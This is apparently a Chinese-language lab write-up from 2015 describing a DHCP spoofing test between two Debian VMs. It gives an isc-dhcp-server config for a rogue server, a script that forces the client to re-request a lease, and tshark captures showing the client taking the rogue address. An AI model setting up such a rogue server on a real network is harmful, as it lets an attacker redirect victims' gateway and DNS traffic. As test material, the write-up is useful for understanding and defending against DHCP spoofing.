准备两台虚拟机,操作系统debian7
一台搭建好DHCP服务器,作为伪装的dhcp server;另一台作为client端,请求dhcp分配IP地址
正常环境下,虚假的DHCP服务器会给client虚拟机分配IP地址,达到欺诈的目的
前提条件,必须查询到CIDR,range IP地址,掩码,DNS服务器等信息,为下面搭建DHCP服务器做准备
开始测试
首先是伪装DHCP的虚拟机
VM1:IP地址为10.180.163.200/28
在这台虚拟机上搭建DHCP服务器
安装:
apt-get install isc-dhcp-server
配置DHCP信息:
subnet 10.180.163.192 netmask 255.255.255.240 {
INTERFACES="eth1";
range 10.180.163.201 10.180.163.203;
option domain-name-servers 10.180.156.5;
option routers 10.180.160.1;
option subnet-mask 255.255.255.240;
option broadcast-address 10.180.163.255;
}
其中:
INTERFACES:网卡
range:虚假DHCP服务器准备给client端分配的IP地址范围
domain-name-servers:DNS服务器
routers:网关
subnet-mask:掩码
broadcast-address:广播地址
重启服务
service isc-dhcp-server restart
查下状态
# service isc-dhcp-server status Status of ISC DHCP server: dhcpd is running.
这样一台伪装的DHCP服务器就搭建好了
然后就是准备发送dhcp请求的虚拟机
VM2:IP地址为10.180.163.199/28
根据VM1搭建的DHCP分配的IP范围可以看到,VM2会被分配的IP为201~203
但是需要注意的一点,我们创建的虚拟机的某些信息已经被记录了下来了
VM2:
# cat /var/lib/dhcp/dhclient.eth1.leases lease { interface "eth1"; fixed-address 10.180.163.199; option subnet-mask 255.255.255.240; option dhcp-lease-time 86400; option dhcp-message-type 5; option dhcp-server-identifier 10.180.163.196; option domain-search ; option dhcp-renewal-time 43200; option rfc3442-classless-static-routes 22,10,180,160,0,0,0,0,8,10,10,180,160,1,23,10,180,10,10,180,160,1,23,10,180,8,10,180,160,1,12,172,16,10,180,160,1,16,192,168,10,180,160,1; option broadcast-address 10.180.163.207; option dhcp-rebinding-time 75600; option host-name "host-10-180-163-199"; renew 4 2015/10/15 19:53:11; rebind 5 2015/10/16 07:41:12; expire 5 2015/10/16 10:41:12; }
可以看到,记录的就是创建虚拟机,网络真实分配的IP地址199
因此假如想要发送dhclient请求,首先要清空这个文件
echo '' > /var/lib/dhcp/dhclient.eth1.leases
之后清空网卡eth1的IP地址
ifconfig eth1 0
最后VM2发送dhcp请求
dhclient -v eth1 -lf /var/lib/dhcp/dhclient.eth1.leases
写成一个shell脚本
#!/bin/bash NIC=$1 echo '' > /var/lib/dhcp/dhclient.$NIC.leases ifconfig $NIC 0 dhclient -v $NIC -lf /var/lib/dhcp/dhclient.$NIC.leases
参数带eth1来执行,写成一个脚本的原因是,这种测试场景下,并不是每次虚假DHCP服务器(VM1)都能够完成给VM2分配201~203的IP地址,而正常情况下,dhcp请求的主机会根据DHCP响应的先后来分配IP地址,确切地说,是根据成功分配IP地址的先后来完成分配,也就是说,如果是真实DHCP服务器先响应完全分配了199,那么虚假DHCP分配的201~203就没法完成;只有当虚假DHCP先完全完成分配IP地址,VM2才能真正地被欺骗
下面是通过抓包来进行分析,用到的抓包工具是wireshark的命令行工具tshark
VM2:发送dhcp请求
# dhclient -v eth1 -lf /var/lib/dhcp/dhclient.eth1.leases Internet Systems Consortium DHCP Client 4.2.2 Copyright 2004-2011 Internet Systems Consortium. All rights reserved. For info, please visit https://www.isc.org/software/dhcp/ Listening on LPF/eth1/fa:16:3e:ab:1d:c3 Sending on LPF/eth1/fa:16:3e:ab:1d:c3 Sending on Socket/fallback DHCPDISCOVER on eth1 to 255.255.255.255 port 67 interval 5 DHCPREQUEST on eth1 to 255.255.255.255 port 67 DHCPOFFER from 10.180.163.196 DHCPACK from 10.180.163.196 bound to 10.180.163.199 -- renewal in 34476 seconds.
看上去好像分配的还是199,没有被欺骗的样子
VM1:虚假DHCP服务器,能够收到请求
tshark -i eth1 -R "udp.port == 67" tshark: Lua: Error during loading: [string "/usr/share/wireshark/init.lua"]:45: dofile has been disabled Running as user "root" and group "root". This could be dangerous. Capturing on eth1 117.261618 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Discover - Transaction ID 0xd8b82b19 117.262926 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Request - Transaction ID 0xd8b82b19
VM1:请求主机
~# tshark -i eth1 -R "udp.port == 67" tshark: Lua: Error during loading: [string "/usr/share/wireshark/init.lua"]:45: dofile has been disabled Running as user "root" and group "root". This could be dangerous. Capturing on eth1 36.233466 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Discover - Transaction ID 0xd8b82b19 36.234861 10.180.163.196 -> 10.180.163.199 DHCP 370 DHCP Offer - Transaction ID 0xd8b82b19 36.234957 10.180.163.195 -> 10.180.163.199 DHCP 370 DHCP Offer - Transaction ID 0xd8b82b19 36.235035 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Request - Transaction ID 0xd8b82b19 36.235537 10.180.163.196 -> 10.180.163.199 DHCP 391 DHCP ACK - Transaction ID 0xd8b82b19
的确看到了ACK,但是这个ACK是从真实的DHCP服务器196来的,而不是我自己搭的虚假DHCP服务器199
这时候就多发送几次请求,因为我们测试的目的就是要达到欺骗的目的,让虚假DHCP服务器VM2欺骗主机VM1
VM2:继续发请求,看上去成功了
~# ./dhclient.sh eth1
Internet Systems Consortium DHCP Client 4.2.2
Copyright 2004-2011 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/eth1/fa:16:3e:ab:1d:c3
Sending on LPF/eth1/fa:16:3e:ab:1d:c3
Sending on Socket/fallback
DHCPDISCOVER on eth1 to 255.255.255.255 port 67 interval 7
DHCPREQUEST on eth1 to 255.255.255.255 port 67
DHCPOFFER from 10.180.163.200
DHCPACK from 10.180.163.200
bound to 10.180.163.203 -- renewal in 242 seconds.
根据信息可以看到,收到了来自200的ACK,分配了203IP地址
VM2:查看dhcp包得情况
~# tshark -i eth1 -R "udp.port == 67" tshark: Lua: Error during loading: [string "/usr/share/wireshark/init.lua"]:45: dofile has been disabled Running as user "root" and group "root". This could be dangerous. Capturing on eth1 6.987536 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Discover - Transaction ID 0x97a3b630 6.987813 10.180.163.200 -> 10.180.163.203 DHCP 342 DHCP Offer - Transaction ID 0x97a3b630 6.988263 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Request - Transaction ID 0x97a3b630 6.989307 10.180.163.200 -> 10.180.163.203 DHCP 342 DHCP ACK - Transaction ID 0x97a3b630
可以看到discover,offer,request和ack
VM1:查看client主机
~# tshark -i eth1 -R "udp.port == 67" tshark: Lua: Error during loading: [string "/usr/share/wireshark/init.lua"]:45: dofile has been disabled Running as user "root" and group "root". This could be dangerous. Capturing on eth1 9.471834 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Discover - Transaction ID 0x97a3b630 9.472527 10.180.163.200 -> 10.180.163.203 DHCP 342 DHCP Offer - Transaction ID 0x97a3b630 9.472750 0.0.0.0 -> 255.255.255.255 DHCP 342 DHCP Request - Transaction ID 0x97a3b630 9.472944 10.180.163.196 -> 10.180.163.199 DHCP 370 DHCP Offer - Transaction ID 0x97a3b630 9.473153 10.180.163.195 -> 10.180.163.199 DHCP 370 DHCP Offer - Transaction ID 0x97a3b630 9.473897 10.180.163.200 -> 10.180.163.203 DHCP 342 DHCP ACK - Transaction ID 0x97a3b630
看到这里,应该自信满满地相信肯定分配了IP地址203,查看一下client
~# ifconfig eth1
eth1 Link encap:Ethernet HWaddr fa:16:3e:ab:1d:c3
inet addr:10.180.163.203 Bcast:10.180.163.255 Mask:255.255.255.240
inet6 addr: fe80::f816:3eff:feab:1dc3/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:790 errors:0 dropped:0 overruns:0 frame:0
TX packets:515 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:96388 (94.1 KiB) TX bytes:162776 (158.9 KiB)
看到这里,可以发现,本来IP地址为199的主机,硬生生地被我搭建的DHCP服务器200分配了一个本不应该的IP地址203(201~203范围)
更有趣的是,就算被欺骗的VM2重启机器,会发现,多试几次依旧是可能被虚假DHCP服务器分配的IP地址203
root@test-spoofing-1:~# reboot The system is going down for reboot NOW!t-spoofing-1 (pts/1) (Thu Oct 15 19:2 root@test-spoofing-1:~# Connection to 10.180.156.10 closed by remote host. Connection to 10.180.156.10 closed. ~/server on master! ⌚ 19:23:05 $ ssh -i dev.private root@10.180.156.10 Linux test-spoofing-1 3.2.0-4-amd64 #1 SMP Debian 3.2.65-1+deb7u1 x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Oct 15 19:23:47 2015 from 10.180.158.2 root@test-spoofing-1:~# ifconfig eth1 eth1 Link encap:Ethernet HWaddr fa:16:3e:ab:1d:c3 inet addr:10.180.163.203 Bcast:10.180.163.255 Mask:255.255.255.240 inet6 addr: fe80::f816:3eff:feab:1dc3/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:49 errors:0 dropped:0 overruns:0 frame:0 TX packets:8 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:4136 (4.0 KiB) TX bytes:1172 (1.1 KiB)
